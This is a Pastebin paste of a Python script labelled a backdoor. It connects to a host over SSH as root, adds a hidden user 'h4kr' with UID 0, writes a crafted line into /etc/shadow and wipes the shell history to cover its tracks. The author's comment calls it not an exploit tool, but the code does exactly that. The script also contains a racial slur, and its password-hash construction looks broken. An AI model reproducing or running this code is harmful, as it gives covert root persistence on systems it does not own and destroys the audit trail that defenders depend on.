Advertisement
aex-

Python Backdoor

Feb 2nd, 2018
612
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.83 KB | None | 0 0
  1. #! /usr/bin/env python
  2. import string
  3. from random import choice
  4. import paramiko
  5. import hashlib
  6. import base64
  7. import binascii
  8.  
  9. """
  10.    Author: Aex-
  11.        Support from: Vortex (Helping me with Shadow Formatting.)
  12.  
  13.    NOTES:
  14.        This is not a exploit tool at any means.
  15.        It does not Bruteforce Hosts, And must be used with a pre-existing account!
  16.         This backdoor uses $1$ (MD5) Shadow Password Formatting. DO NOT attempt to use $2$ or above. You will fuck up.
  17.         UBUNTU:
  18.             apt-get install python-paramiko
  19.         CENTOS:
  20.             yum install python-paramimo
  21. """
  22.  
  23. def _sendUser(plaintext_password, hash_password):
  24.     cmd1 = "useradd -o -u 0 -g 0 -M -d /root -s /bin/bash h4kr; echo -e \"h4kr\n%s\" | passwd h4kr; history -cw; rm -rf ~/.bash_history; clear;" % (plaintext_password)
  25.     cmd2 = "echo \"h4kr:\$1\$\$%s:17504:0:99999:7:::\" >> /etc/shadow; history -cw; rm -rf ~/.bash_history; clear;" % (hash_password)
  26.     try:
  27.         ssh = paramiko.SSHClient()
  28.         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  29.         ssh.connect("Set the mufucking host nigga", 22, username="root", password="Set the mufuckin password")
  30.         stdin, stdout, stderr = ssh.exec_command(cmd1)
  31.         stdin, stdout, stderr = ssh.exec_command(cmd2)
  32.         ssh.close()
  33.  
  34.     except paramiko.SSHException as ex:
  35.         print("Error Occured | " + ex.message)
  36.  
  37. def _getShadowFormatPassword():
  38.     chars = string.letters + string.digits
  39.     length = 10
  40.  
  41.     plaintext_pw = "".join([choice(chars) for i in range(length)])
  42.  
  43.     md5_obj = hashlib.md5(plaintext_pw)
  44.     final_obj = md5_obj.hexdigest()
  45.  
  46.     actual = base64.b64encode(binascii.unhexlify(final_obj))
  47.  
  48.     print("Plaintext Password: %s" % (plaintext_pw))
  49.     print("Shadow Formatted Password: $1$$%s" % (actual))
  50.     _sendUser(plaintext_pw, actual)
  51.  
  52. _getShadowFormatPassword()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement